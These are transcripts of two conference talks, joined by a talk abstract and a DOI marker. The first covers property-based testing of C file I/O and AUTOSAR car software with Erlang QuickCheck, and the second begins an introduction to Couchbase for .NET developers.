And then very easy debugging because you get very small reduced examples. OK. That's all a bit abstract. I'm going to do a demo. I'm going to do another demo tomorrow. So I'm going to do quite a lot of this stuff. But today, I'm going to test some of the standard C library functions. So it's just to show you what a QuickCheck specification can look like. So I'm going to test F writes that writes some bytes to a file, F read that reads a number of bytes from a file, and F seek. And that sets the position in the file where the next read or write will take place. So let's see what that looks like. The way that we test this kind of code is by building, well, but first of all, generating test cases that are a sequence of API calls, well, surprise, surprise. But then modeling the state of the system. So for every API call, we'll formalize, we'll write a function that specifies how the model state is transformed by that call. And then we write a bunch of post conditions that compare the results from the actual system under test to the model of the state. And all of this stuff, we write in Erlang. So we can test all kinds of different software in this way. We can test Erlang software. We can test C software. But no matter what we're testing, we write the specification in Erlang. So we're taking advantage of the concise and mostly likely to be correct nature of Erlang to make the specifications easy to write. For example, I might generate a test that writes one byte a zero to the file, seeks back to position zero, the beginning of the file, and then reads one byte. So that might be a test case that I'll generate. How can I model the state of the file? Well maybe by the list of bytes that I think should be in it and the position that I think the next read or write should occur at. So when we start off, then, okay, what? Watch this. When we start off, how cool is that? Then the file is empty and it's at position zero. After we've written one byte to it, the file contains a zero and it's at position one. So the seek, then it still contains one zero, but the position is zero. And now the post condition for read will say that if you're in that state and you try and read one byte, you should get zero. Okay, so that's the approach that we're going to take. Let me run a demo. So I'm actually going to start with an even simpler C code just to get going. So I take it, everybody can read and understand this code. All it does is put an integer into the value n and then provide a get operation to return it. So I'm going to test code using the Erlang shell that Brian showed us in the last talk. So I will need to compile that C code, which in this case I can do like this. And having done so, then it's, I can call it from an Erlang put get module. Let's put three. Let's call get. There we are. I got three. If I put four, now I'll get four. So it's very easy to call C from Erlang for testing purposes. So what does the specification look like? Well, here it is. I have to model the state. So I have to say what state we'll start off with and we'll start off with a state of zero. Why? Because that's the initial value of n. We specify how to generate each command. So we'll generate puts by calling put get put with a random integer. What is the state transition when we call put? Well, when we call put n, the new state becomes n. So I just write a state transition function that returns the modified state. This specifies how to generate a call of get. It's very easy. And here's the post condition for get. 
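Reconstructed roughly from the narration (the grouped callback names follow the convention the talk describes, and restart_c_program/0 is a stand-in for however the compiled C program actually gets restarted), the put/get specification looks something like this:

```erlang
%% Sketch of the put/get model -- a reconstruction, not the exact demo code.
-module(put_get_eqc).
-include_lib("eqc/include/eqc.hrl").
-include_lib("eqc/include/eqc_statem.hrl").
-compile(export_all).

%% The model state is simply what we believe the C variable n contains.
initial_state() -> 0.

%% put: call the C function with a random integer; the model becomes that integer.
put_args(_S) -> [int()].
put(N) -> put_get:put(N).
put_next(_S, _Result, [N]) -> N.

%% get: no arguments; the post condition compares the real result to the model.
get_args(_S) -> [].
get() -> put_get:get().
get_post(S, [], Result) -> Result =:= S.

%% Stand-in: the demo restarts the C program here so that n starts at 0.
restart_c_program() -> ok.

prop_put_get() ->
    ?FORALL(Cmds, commands(?MODULE),
            begin
                restart_c_program(),
                {_History, _State, Result} = run_commands(?MODULE, Cmds),
                Result =:= ok
            end).
```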
It says that the result that get returns should be equal to the model of the state. Very simple. And then the property says, for all test cases generated containing puts and gets, when I run that test, then the result should be okay. What does that mean? It means there should be no exceptions and all the post conditions should be true. What's this line? This line restarts the C program. I'm doing that in each test just so that we start with a known value, zero, in that variable n. It's a slightly heavy way of doing it, but it works. Let me compile that specification. It's airline compilation. What can I do with it now? Well, I can run QuickCheck and I can give it the property, that's the last piece of code that I showed you, as an argument. When I do that, QuickCheck will generate 100 random tests and run them all and in this case, they all passed. Surprise, surprise. Okay. So, that's a very simple example. What happens if there's a bug? Let me insert a bug here. I'll say if n is not equal to 11, then update it. Once n becomes 11, it'll get stuck. Let me recompile the C code and rerun the tests. Many of them pass, but then one of them fails. Now what's all this output? This shows us what happened during the test and you can see that it was a random test. It's got a large number of calls. In here, we put 11 and then we did some more puts and we made a get that returned the wrong result, but you can see you wouldn't want to try and diagnose that. So instead, we let QuickCheck do its shrinking and we end up with this. This is the test case that we would actually report as revealing the error. You put 11, then you put 0, and then you call get. It fails because the post-condition says that 11 should have been equal to 0 the last thing we put and it's not. Okay. So, that shows you a simple example of shrinking. That's very, very tiny. Let me go instead to the next C code I'm going to test. So this is a very trivial C file. Its purpose is just to give me something to load into AdLang that will make the functions in Stood.io available. The purpose of this is to let me refer to a macro, a hash defined constant. So, when we load C code, we can call functions, but we don't get access to macros and I need C set. It's one of the parameters you have to pass to C. Okay. And here, we have an example of a specification for the file I.O. So I've got, I'm going to use an AdLang record to model the contents of the file. I'm going to keep track of the contents initially empty, the position initially 0. And I'll also need to keep track as I run the test of the file stream after I've opened the file. And we start off just with default values in the initial state. So here's how we specify operations like open. Okay. So, there's a precondition. F open pre is always the precondition for F open. The names are conventional. And that just says, well, you can call open if the stream is currently undefined. And as we haven't opened anything yet. How do we call open? Like this. So we open a file called data.dat. For reading and writing, it's a binary file and the plus means something. I can't remember what. What's the state transition when we open the file? Well, it just returns a new state in which the stream component of the record has been replaced by the result of open. So we save the stream. And that's so that, for example, when we call seek, which we can only do once the stream is not undefined, then we call seek with one argument that is that stream and the other argument that is a random positive number. 
This is actually the function that we're calling in the test. And it's passing seek set, which is you have to do as the third argument to the C version. The C version is in this file studio.fseek. And what does seek do? Well, it updates the position in the file, as you would expect. So this is a little bit interesting. Notice we update the position no matter what the position is. So you don't have to keep the position within the file. You can have an empty file and set the position to one million bytes in. No problem. What happens then when you write something in that situation? So here's how we generate a write command. This generates a write to the stream with a random list of bytes, char, their signed bytes in C. And this here is the code that's specified. It's the effect of write. It looks kind of scary. But it's not really. So what am I doing? Well, I'm just, first of all, binding contents, the variable contents, to the current contents of the file. Now if you write a position one million when the file is empty, what's supposed to happen is that the file gets zero extended up to that point. So that's what's happening here. I'm saying, well, if the file is already big enough, because I take the position, I add the length of what I'm going to write, and it's less than the contents, that's fine. No extension needed. Otherwise, I have to extend it with zeros so that it becomes long enough. And now the stuff down here is saying, OK, now take the extended model of the file, split it at the position. That gives me the prefix that comes before what I'm going to write and the rest, split the rest of it at the length of the data that I'm writing. That gives me the middle that's going to be overwritten and the post that comes after. So what's the new contents of the file going to be? It's just pre and then L and then post. And the position is going to be after what I've written. OK. So the behavior of write is a little complex, but it's quite easy to specify using list operations and declarative lists in this manner. And then we've got read as well. But I think you'll trust me that I've specified read correctly. Let's run some tests. OK. So I will need to compile the C code. We ignore warnings. And I'll need to compile my specification. And now I can run QuickCheck. Wow. Something didn't work. OK. What happened here? Once again, you can see that the initial random test was quite long. Oh, only seven steps. But still, the smallest failing test is much shorter. And it doesn't fit on the screen, does it? Darn. So what happened? We opened the file, we did a write, and then we did a read. I wrote just a zero. But now there's a zero in the file, but the position is at the end of the file, right? I did a read. And what do you know? I read a zero. What happened? I seem to have read what I just wrote, even though I didn't reposition the file pointer. Any clue what's gone wrong? Well, maybe reading has its own pointer. Is that possible? Let's find out. I'll just modify my spec then. I don't expect to find bugs in the C library, of course. I'm just trying to understand what it does. So let me add a reading position. And then in the specification of read, which is down here, I will replace the position by reading position. And I think I had better change the specification of seek as well, so that, here we are. It updates both positions. Okay. So now, if I recompile my specification, then I can rerun the last test. There's a call for doing that. Just check. And now it passes. Okay. 
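The write and seek transitions at this point in the demo might be reconstructed roughly like this; the record and function names are guesses, only the shape of the logic (zero-extend, then splice the bytes in, plus the separate reading position just added) comes from the narration:

```erlang
%% Sketch of the file model -- a reconstruction, not the exact demo code.
-record(state, {contents = [],          %% bytes we believe are in the file
                position = 0,           %% where the next write happens
                reading_position = 0,   %% separate pointer discovered for reads
                stream = undefined}).

%% State transition for fwrite: zero-extend if writing past the end, then
%% splice the new bytes in at the current position.
fwrite_next(S = #state{contents = Contents0, position = Pos}, _Result, [_Stream, Bytes]) ->
    Needed   = Pos + length(Bytes),
    Contents = if length(Contents0) >= Needed -> Contents0;
                  true -> Contents0 ++ lists:duplicate(Needed - length(Contents0), 0)
               end,
    {Pre, Rest}  = lists:split(Pos, Contents),
    {_Mid, Post} = lists:split(length(Bytes), Rest),
    S#state{contents = Pre ++ Bytes ++ Post,
            position = Pos + length(Bytes)}.

%% fseek now has to reset both the write position and the reading position.
fseek_next(S, _Result, [_Stream, Pos]) ->
    S#state{position = Pos, reading_position = Pos}.
```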
So let's run random tests again. And 100 of them passed. Okay. This didn't happen last time. Okay. Well, that was a surprise because it's the wrong fix. But I will worry about that later. Okay. So, actually, if I now recompile my spec and rerun the test, it still fails. It turns out that you're not allowed to call read directly after write. Before you do a read with these functions, you must call a seek. So let me just add a state here to record whether or not I'm writing. And I will change the model of write so that, as well as updating the contents, it just sets the state to be writing. Now here I have a precondition for read, which says when I'm allowed to call it. So if I say that the state must not be writing, that will then not allow me to call read after a write. And, of course, I need to be able to restore the state so that I can do a read again. And that I will do in the specification of seek so that we will say that, among other things, seek resets the state to undefined. Okay. So if I compile that and rerun my failing test, it still fails, but for a different reason. If you look here, it says now a precondition failed. In other words, this is now not considered a good test because I called read and I should not have done so. So that's fine. Oh, let me run more random tests. And now here we see a different failure. Okay, so what's happened here? I opened the file. I did a seek to position one. I wrote zero bytes. Oh, maybe a little odd, but nevertheless. So that should extend the file, shouldn't it? To be one byte long. Then I did a seek back to the beginning and I tried to read one byte and I got an empty list back. So read failed. Read didn't see any data. So the zero extension didn't happen. And why was that? Well my guess is that it's because I wrote zero bytes. So let me model that. I will just add another clause here saying that if you write zero bytes, the state doesn't change. So notice that write does much more than just write the bytes. It does the zero extension stuff. But none of that seems to happen if you write zero bytes. I suppose it's an optimization. I have not found that documented anywhere though. Okay, so let's recompile that again. Rerun the last test. Now it passes. Run more random tests. Okay, another one failed. Let's see what we get after shrinking. Wow, this one's shrinking a long time. Okay, what happened? We opened the file. We wrote a zero byte. We did a seek back to the beginning. We read one byte and we got zero. That's good. We wrote another zero. Okay, so what should the file contain now? Two zeros, right? We did a seek back to the beginning and we tried to read two bytes. What should we see? Two zeros. What did we see? One zero. So my second right has been thrown away. How come? It turns out that not only must you not read after a write, but you must not write after a read. And that's what happened here. I did a read followed by a write without a seek in between. And you just mustn't do that. It's in the C standard actually. So okay, now I know that. Let me modify right precondition to say that the file state must not be reading. And I'll modify read state transition function, if I can find it, to say that once you do one read, the state becomes reading. And once again, it'll go back to undefined when we do a seek. And now if I recompile that, then that last test is now a bad test. Precondition fails. And if I run random tests, this time they pass and they all two. 
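The extra restrictions just discovered might be modelled roughly as follows; again this is a sketch with invented names, extending the record from the previous sketch with a field that remembers the last kind of operation:

```erlang
%% The earlier state record, extended with last_op to track read/write mode.
-record(state, {contents = [], position = 0, reading_position = 0,
                stream = undefined, last_op = undefined}).

%% You may not read directly after a write...
fread_pre(#state{stream = Stream, last_op = Op}) ->
    Stream =/= undefined andalso Op =/= writing.
fread_next(S, _Result, [_Stream, _Len]) ->
    S#state{last_op = reading}.   %% advancing reading_position is omitted here

%% ...and you may not write directly after a read.
fwrite_pre(#state{stream = Stream, last_op = Op}) ->
    Stream =/= undefined andalso Op =/= reading.

%% In addition, fwrite_next gets an extra clause so that writing zero bytes
%% leaves contents and position untouched (only last_op changes), e.g.
%%   fwrite_next(S, _Result, [_Stream, []]) -> S#state{last_op = writing};
%% with the non-empty case keeping the splice logic shown earlier.

%% A seek makes both reads and writes legal again.
fseek_next(S, _Result, [_Stream, Pos]) ->
    S#state{position = Pos, reading_position = Pos, last_op = undefined}.
```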
Okay, so I haven't really found any bugs, but I've learned things I didn't know about the behavior of read, write, and seek in C. So you might very well think, if you're writing C code, that if you just read some bytes from a file, and then you want to write something directly afterwards, that you could optimize your code by leaving out the seek, because you're already in the right place. Right, doesn't that make sense? But you can't do it, because if you do, your right may get lost. Okay, so that shows you what testing C code, at least with QuickCheck is like. And what can we learn from seeing that? Well, one thing we can learn is that one specification of how the code is expected to behave can find many different bugs. So I found several strange behaviors from that one example. And secondly, I hope you agree that those minimal failing tests are relatively easy to debug. So we have been applying this stuff to testing these out-of-sar components. One difference from testing those little programs is that the components are not self-contained. They're always making calls to other components. And so, of course, we have to also generate, we have to mock the other components, and we have to generate the mocked behaviors. So our model of one component will specify not only how to call it and how its call should behave, but also what calls it should make to other components. And so we have a slightly more complex kind of QuickCheck state machine that generates both API calls and mock behavior. Here's a fragment of source code from one of our models that does that. And it looks very like the examples you've already seen. So this specifies how to halt communication in the flex array interface. And it has a precondition that says you can only halt if the control is synchronized and something is initialized. And there's the state transition function that says basically when you halt communication, the state becomes FR pox stake halt. And down at the bottom here, this specifies which call outs we expect to appear and how to mock their results. So we just write an additional function definition for each operation we're specifying that characterizes the mock behavior that we need. And then what we test is that for every sequence of API calls that satisfy our preconditions, all the post conditions must hold. And all the call outs that are actually made must match the mocking specification. Here's one of the bugs we found. This is a bug in a vendor's CAN stack. So on the CAN bus, every message has an identifier. And that identifier also serves as priority for the bus. The lower the number, the higher the priority. So if you've got priority one, then your message should always go over the bus when possible. So in this test case, we first of all asked the CAN stack to send the message with priority one. And we observed a call out that it actually started sending one on the bus. That makes the bus busy. Now nothing else can be sent until that transmission is complete. So then we sent two more messages with priority two and three. They were queued up. And then finally, we made a call of transmission confirmed. That's a call to the CAN stack that is usually made from below. It's made when the bus says, I finished my previous transmission. I'm ready for something else. So what message should the CAN stack send next? The one with priority two. And what message did it send next? The one with priority three. So how could that happen? 
It turns out it's because the CAN protocol lets you have two different forms of CAN ID. The original protocol only allowed 11 bits for the CAN ID. But that means only 2,000 different message types in the entire car. It's just not enough. So the new version of the protocol allows an extended CAN ID with 29 bits. So that should keep car software developers going for a while. But of course, the protocol still has to support the standard CAN IDs, which means you can have a mixture of the two on the bus. Now when you mix the two, as far as priority is concerned, it's only the value of the identifier that matters. It's not what form it has. But in this software stack, both forms of CAN ID were stored in one unsigned 32-bit integer. Since you need to know what kind of ID it is when you send a message, so you can use either the 11 bits or the 29 bits, they set the top bit to distinguish an extended CAN ID. So what does that mean? It means when you compare IDs to decide which message to send, you must mask off the top bit. And of course, they forgot to do that. Our message with priority two had an extended CAN ID, so it was considered to be 2 to the 31 plus 2, and thus was sent after the message of priority 3. Does this matter? Well, you know, those priorities are there for a reason. Everything talks over the CAN bus in a car. The stereo may talk over it. Your brakes do. You want your brakes to have priority over the stereo. So it's not good if the stack mixes up the priorities. And it was a good thing to find this bug. But the real point that I want to make about this is this is perhaps a very hard bug to find. It's a low-level bug involving failing to mask off a bit in C code. And yet, we can still generate and shrink a short test case, just the sequence of four calls that makes it relatively easy to debug. And that's the experience that we have had again and again and again in testing this out-of-sar code. OK, so what were the challenges, particular challenges, of this project? Well, one of them was that, as I showed you on one of my early slides, the out-of-sar modules or components are gathered into clusters. So all the layers of the protocols are individual components, but they're typically delivered together. And when they're delivered together, the supplier often doesn't even bother to implement the interface between the layers. It's more efficient not to. So the question then is, how are we going to test this stuff? So we started off thinking, well, we'll just write a model for the entire cluster. Nightmare, because in order to figure out what the model was, we would have to read five different PDFs and trace the behavior through from the API called to the top layer down to what's supposed to come out at the bottom. So we managed that with one cluster. We made a model of that sort. And even having done so, it was a nightmare. Because when we found a bug, then the supplier would say, well, show us in the standard why this is a bug. And the standard specifies how each module behaves. So if we had a model that specified the entire cluster, it was much harder to relate it back to the standard and show why a particular test should be considered a failure. So in the end, what we did was we figured out how to specify the component separately and then cluster the models together. And that was quite challenging, but we made it work. 
So that meant that we could cluster together several models, models of each layer of a protocol, specify them separately, cluster them together, and then test the entire stack. Other challenges. Well, let's focus on those com services for a while. In fact, let's focus on the very top module, the com module. That's the routing module. There you can see the specification, page one of 179. And you know what? It's not even self-contained. The first thing you have to do to try to understand this is to read the older standard, the OSEK com module description. That's another 73 pages. So there was just masses of text to read and understand before we could build these models. So you might think, did we have to do essentially as much work as the implementers? Because we more or less had to represent the entire behavior of the standard as Erlang models. Well, no. Here is a comparison of code sizes between our models in red and the implementations in C for four of those components or four of those clusters. And as you can see, our code is four to six times smaller than the implementation, which is pretty good, pretty good ratio for test code. We were also able to get hold of a standard test suite for the Flex-Ray interface. And we could compare the size of this TTC-N3 test suite with the size of our QuickCheck model. Our code was nine times smaller, and it tests much more. So these are good results. And it's nice that we've been able to use the technique on a large scale project where we can actually have sensible code sizes to compare. Another challenge. How do we know our code is right? So when we run a test of some vendor code against our models and the test fails, what it tells us is that there's a bug in the vendor code or in our model. What we found is an inconsistency between the two. So how do we know where the bug is, whether it's our fault and we should fix the model, or whether it's the vendor's fault? So just as QuickCheck is testing the vendor code, we used the vendor code to test our models. And I think this was really essential. It was essential that we had vendor code available. Because of course, when we write models in QuickCheck, we wrote 20,000 lines of Erdlang to model out of SAR. Of course, it was full of bugs and mistakes. And we would not have been able to find our own mistakes if we hadn't been able to run our code for which we needed vendor code to test. But still, the question is then, how do we know who's correct? Well, it's obvious, right? Read the standard. When that doesn't work, luckily, we could ask Volvo. It was great to have an Oracle who could tell us absolutely not what the standard meant, but what they want. So reading the standard, for example, here's a bit of it. This is from the com document. This is a problem I found. I know it's gobbledygook. So let me just explain. IPDU means channel, and SDU means server. IPDU means channel, and SDU means message. Here's one of the requirements. The first one, in fact. So it says, this particular call, trigger transmit, will return EOK if the message has been copied, and E not OK if the message has not been copied. OK, that's clear enough. Just in case you don't understand it, there's some explanation in the next paragraph. It says, it will return E not OK if a stopped channel is requested. You can stop channels. OK? However, even for stopped channels, it copies the data. Wait a minute. The requirement says, E not OK means no data has been copied. 
The explanation says, for stopped channels, you get E not OK, and the data has been copied. What's right? Ask Volvo. We've found many of those things, and they've been fed back into the revision of the standard, which is an ongoing process. And so we've led to clearing up a lot of ambiguities there. Here's another problem we run into. I showed you, when we run QuickCheck and a test fails, we get the minimal failing test case. What do you think happens if we run QuickCheck again? Well, it might not, but if the bug appears fairly often, it almost always will. And it's almost always the same minimal failing test. So imagine the situation then. We get a delivery from a vendor. We start testing it. We find one bug, what now? Well, we could report it to the vendor and wait three weeks for them to send a new version, but that's just not productive. We have to find more bugs. So the best way to proceed is, of course, to fix the bug. And then the most probable bug will be a different one. But to do that, you have to have the source code. Sometimes we did. Sometimes we did this. On the other hand, we weren't being paid to fix other people's C code. So it felt a bit frustrating. What else could we do? Unfix the spec. And this is what we had to do all the time. So look, here is a part of one of our models. It's for initial send timer operation. And look, that red stuff. That's an Erlang macro that we could hash define to be true or false. So if COM bug 14 is present, then we initialize the number of ticks wrongly. Otherwise, we do the right thing. If COM bug 27 is present, then we fail to initialize the data in some data structure. So our code ended up full of these things, which we had to do to make progress. So we would have to model the effect of one bug, and then we could find the next one. Far quicker than waiting for suppliers to fix them. But then, of course, we had to deliver specifications to Volvo cars. They didn't want a specification full of a description of all of the different bugs in the vendor code that we had used. So of course, we had to delouse it before sending it to Volvo. And the first time we did that, it was a lot of manual work. Enter Wrangler. Wrangler is a refactoring tool for Erlang. And a very nice property of it is it's scriptable. So we were able to script a delousing refactoring that would just take all those macros, replace them by false, and then apply a number of simplifications to the code. Here's some code before delousing. You can see it's looking to see is can TP bug 5 present? If so, we do one wrong thing. If not, then there's another case in which, if can TP bug 6 is present, then something else goes wrong. There it is after delousing. Turning that from a big manual job into a push button process was really sweet. So what results did we get? Well, we tested code from six different potential suppliers to Volvo. We found more than 200 issues with that code. Now, I say issues. They went all bugs. More than 100 were problems in the standard, like the one that I showed you. So if you've got a problem with that code, so if you've got a standard that is self-contradictory, what are you going to do as an implementer? You have to choose something. And we found many cases in which the implementers had made different choices. And that could, of course, lead to the code not working together when it was integrated. So we've had a lot of problems in the standard. The effect has been a big improvement there. 
And another 100 or so issues that were simply bugs in the code that might have found its way into your next car. And the certification process is going on as we speak. So I'm very hopeful. Oh, yeah. Let me just tell you. We found a little bit of culture shock on the part of the suppliers when they discovered they were going to face this process. So we were at a one-day meeting that Volvo had called to explain their requirements to the suppliers. And among other things, this was explained. So the suppliers knew that they were going to have to pass tests that we were responsible for. So of course, what did they ask us? Can we get the test suite in advance? And they weren't expecting the answer. No, there is no test suite. We're going to generate millions of tests. And you have to pass every single one. Anyway, I'm very hopeful that the next generation of all those will have at least basic software that has gone through some very rigorous testing. And it feels good to hope that the next generation of cars may be a bit more reliable or safer as a result. OK. We have plenty of time for questions. Do I have a Volvo? Not yet. You found 200 bugs. You wouldn't do that, right? No, no. The bugs are not involved with software. They're in the suppliers. And the suppliers supply all the car manufacturers. So we will have made an improvement in the quality of software in very many cars. But we focused on testing the things that matter to Volvo. So I guess. Yeah. Yeah, indeed. Do other car companies have similar testing? No. We are trying to sell it to them, of course. And I think there are some who are very interested. But they're kind of waiting to see how it works for Volvo. So maybe next year. I've got even better story. The manufacturers of software. They're interested. That varies. So there is one company whom I think probably shouldn't name who have indeed bought licenses. And they're very interested in using the same techniques to test not just the out-of-style basic software, but the other software that they're developing as well. And we're very excited about that. I'm looking forward to helping them. From some of the others, some of them seem to have an attitude that if we say, you could deliver bug-free software. And they'll say, but we make all our money fixing the bugs. So not all the suppliers are as interested as we initially thought in being sure that they're compliant to the standard. I mean, some of them think they know better than the standard. And maybe individually they do. But for integration, that's a problem. How high level of confidence do you have that you've covered in all the possible ways? So we look at, for example, we do look at code coverage of the code under test. But that doesn't really tell you much. There's always dead code in there. And more importantly, we collect a lot of statistics on the test cases that we generate. And so one risk with this kind of testing is that you don't actually see the test cases. So if you make a mistake in a precondition, then maybe some operation will never be called. And it's important to gather statistics and make sure that you're not in one of those bad cases. Also, we've encountered things like maybe something is supposed to happen one second after you do something. Well, in this software, how do you make something happen one second later? One of the components will be responsible for making it happen. And it'll have a main function that is called every five milliseconds. 
So that means to observe that thing happening, you've got to call that main function 200 times. And you're not very likely to do that in a randomly generated test. So what we have to do is notice that there's a problem there. And then we just add an operation to our tests that says, call that thing n times where n is in the range of 0 to 300 or something. So we do have to think about the test coverage that we're getting. It's not a completely magic wand. But I'm reasonably confident that we've done a good job there. I'm much more confident than I would be if we've been writing individual tests by hand. You probably can't see us. There's two pictures coming in. I can't see at all. Oh, hi. OK, sorry. OK, so why was there an early version that consisted already of the scale version? So I actually started the company because I was a funding agency at the time, encouraged me very strongly to do that. And also, Ericsson were very interested in using the technology themselves. But it was a whole lot easier to make use of an Erlang version of QuickCheck within Ericsson than the Haskell version would have been. Because they were primarily, or to begin with at least, interested in testing Erlang code. And we found some great bugs in Ericsson's products as well. But that was it. We, our first customer, wanted Erlang. So that seemed a good reason. And actually, I think it was quite a good choice. I mean, we had a panel session yesterday that was supposed to be about typing. And there are some things that, I mean, strong typing in Haskell is wonderful in very many situations. But there are one or two things that it makes more difficult, like generic programming, where you want to be able to walk over any kind of data structure, for example. In Erlang QuickCheck, we do that kind of thing all the time. In Erlang, well, in Haskell, you can write a paper about it still. In Erlang, it's four lines of code. So having a dynamic language for this application has worked very well. The downside is that we have to find our type errors by testing. But what do you know? Testing isn't really a problem for us. And so we have not suffered the downside very much either. When you had an opportunity to understand it, it sounded like you were asking mobile for corrections. Does that mean that the standard became mobile besides? No, no. So what would happen is we would identify a problem in the standard. And we'd ask Volvo to help with that. And either they would decide what they wanted, or in most cases, they would push it upwards to the consortium. Because only out-as-are members of a certain status can do that. And Volvo is such a member. So they would push it up often along with a suggested provision. And then that would be discussed and fixed one way or another higher up. I guess this probably means that Volvo have been among the more active contributors who found problems in the standard. And so perhaps they've had more influence than their size would otherwise give them. It seems like in a way maybe you do have typing even in Erling, because what you're dealing with is at the bit syntax level. And so four bits of numbers, little indian, or it's the same however, I guess, right? Is that part of why the type, lack of types, save you is because you're actually dealing with just binary anyway and bit syntax? Or was that not? No, even when we're not using the bit syntax. In many cases, I mean, in this project, we did use the bit syntax quite a bit for specifying the format of the messages on the buses and so on. 
But even when we don't, I think the typing argument is the same. OK. One more question. I think you might be thinking about it, how do you do exactly cope with real time requirements? Yeah, so this is all real time code. But it's sort of abstract real time code in that the standard says, this function will be called with this frequency, or that's usually something configurable, in fact. So in our tests, what we had to do was make sure that if we call the main function the right number of times, then something happens in the right call. We didn't actually have to measure real time. And indeed, we were running our tests on desktop computers. So real time on the embedded system would be quite different anyway. That's a separate problem that I guess the suppliers in Volvo cope with once they believe the software works otherwise. OK. Well, we're out of questions. And we're also pretty much out of time. So thank you very much for coming to listen. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
|
Modern cars are full of software, with 50-100 processors and tens of millions of lines of code. Increasingly, this software is based on the AUTOSAR standard, drawn up by a consortium including Toyota, Ford, GM, and most of the world's other major car manufacturers. AUTOSAR defines the "basic software" which should run on each processor, providing a standardised environment enabling AUTOSAR applications to be distributed freely around the processors in the car.Such is the theory. In practice, the basic software is supplied by multiple vendors, and follows the standard to a greater or lesser degree. Mixing software from different vendors can lead to unexpected failures as a result. Quviq has been working with Volvo and SP to model AUTOSAR basic software components using Erlang, and test them for compliance using QuickCheck. I'll present some of the challenges and results--which may help make your car more reliable in the future!
|
10.5446/51445 (DOI)
|
Alright, I think we're about to get started. Thanks everyone for coming out. Just a quick check in the audience to see where people are with NoSQL and CouchBase and that sort of genre. How many people have heard of NoSQL before? This is good. A couple of years ago there were very few hands, so obviously it's becoming a little more pervasive. How many people have heard of CouchBase? It's pretty good. CouchDB, MongoDB. So that's sort of the broad range of NoSQL technologies that you've probably encountered. Cassandra might be another one you've encountered. So what I'll do in the beginning of this talk, the talk is really about.NET and CouchBase and writing apps with the.NET client library that I previously supported. And what I'm going to start out with though for those of you who are new to CouchBase is just a quick overview of CouchBase so you can see how it kind of fits in with all those other NoSQL systems. So a little bit about me. I've recently changed positions. I used to work for CouchBase. I was the developer advocate doing the.NET SDK. I decided to kind of take a different path a couple of weeks ago, so I actually worked for a company that's headquartered out here in Europe. Education first. If any of you have been lucky enough to spend a year abroad during high school, you might have gone through our program. I have run the Boston Code Camp. I'm from Boston Mass, so I run the Code Camp out there. Do you guys have Code Camps out here? So the all day, Saturday, Dev events, local community stuff. And if you have any questions for me, you can find me on Twitter at CodeVoyer or you can just find me at johnslablaki.com and there's a link to a form where you can contact me if you have any questions about anything with either CouchBase or NoSQL after this talk. And feel free to drop me a note. So like I said, I'm just going to take about five minutes to cover what CouchBase is and kind of how that, how CouchBase differs from some of the other databases that you may or may not have heard of. But my first question for the audience is how many people have used a dictionary? Not the physical book, the actual. How many people have used Link? So fundamentally it looks like everyone in this room has the background knowledge for working with a database like CouchBase. The concepts from Link are going to key in heavily to the way we do indexing with MapReduce and the concepts from dictionaries are going to obviously play into the key value store aspect of CouchBase. So CouchBase is a hybrid. So a lot of databases kind of, a lot of NoSQL databases tend to fit into one or two, I'm sorry, one bucket only. And that bucket might be a key value store or it might be a document store or a multi-column or some specific genre. But CouchBase is a hybrid database as of 2.0 which came out last December. So CouchBase is both a key value store and a document store. And it's a key value store in that the CRUD operations, the primary CRUD operations are all done through simple key value, simple key value API. Has anyone worked with Memcache D? Is that what it's called now? It used to be Velocity, Microsoft's app fabric, the distributed caching tier on Azure. So it's basically, Memcache D was the original distributed cache across multiple nodes in a cluster of Memcache servers. And CouchBase is fully compatible with Memcache D. So if you've used Memcache D, you understand the primary API for working with CouchBase. 
But again, if you've worked with the dictionary, you also understand how to work with key value pairs. So it's a very simple API for putting data in and getting data out. It's a little more interesting when you want to create a secondary index. And that's what we're going to talk about later on, basically. So you put everything in by key value, but now you want to find users by last name. And their key is not their last name. So a couple other concepts. So again, everything is done with the key value API. You store documents in a bucket. So if I use the term bucket, think of it as a database. It's not precisely a database, but you can kind of think anywhere in SQL Server where you would have right-clicked new database, you would create a new bucket in CouchBase. And then again, secondary indexes are going to be created using JavaScript, and I'll show you a couple examples of that. So rather than, I'm going to try to minimize how many slides I look at. I want to just actually dig right in. I did call this talk code first, so I want to jump right into some actual simple code. So before I jump into the complete example, I think it's useful to start with the Hello World so you can understand what is this CouchBase thing if you haven't seen it. How many people have actually seen CouchBase? I know a bunch of you have heard of it, but has anyone actually used the product at all? So a lot fewer people. So I'll jump in with a simple Hello World, and then we'll kind of work our way up into a more interesting example. How many people have heard the term code first before? So code first for those of you who haven't heard generally refers to the idea that before you design your schema, you design your business objects, and the business objects become your database schema. Now in Ruby on Rails, it's the active record model where you basically define some active records and then auto-generate the schema. Well, I think with NoSQL, it's an interesting approach because everything is code first. You don't define objects, you don't define a schema. So CouchBase is a schema-less database as we'll see as we go along. There's no definition of a table. There's no definition of something that has a schema. So you define your objects and that's how they get saved. Does anyone feel like that's scary, not having a schema? People don't want to admit it. So I'd ask you to consider things like, okay, so one of the things that really bothers people at first instinctively is there's no schema in this database. How do I control what goes in there? But let me ask a couple of questions. How many people have gotten their schema right in the first try before? Usually at least one person says they have. How many people have denormalized their database to make it perform better? So one thing I like to say about NoSQL, a lot of people look at NoSQL and think it's creating a new class of problems. I like to think that it's creating a new class of solutions. So we don't have new problems. We just have the same problems with different solutions. So you've denormalized that database because that query that joined to 10 tables that were perfectly normalized took 10 minutes to retrieve one row. So NoSQL databases tend to start from the other side. Let's optimize first, not worry about having a table with 10 million rows in a column that's null in 900,000 of them. So that's not artificially impose a schema on our data when it doesn't really have one, or let's not artificially enforce these constraints that really don't perform well. 
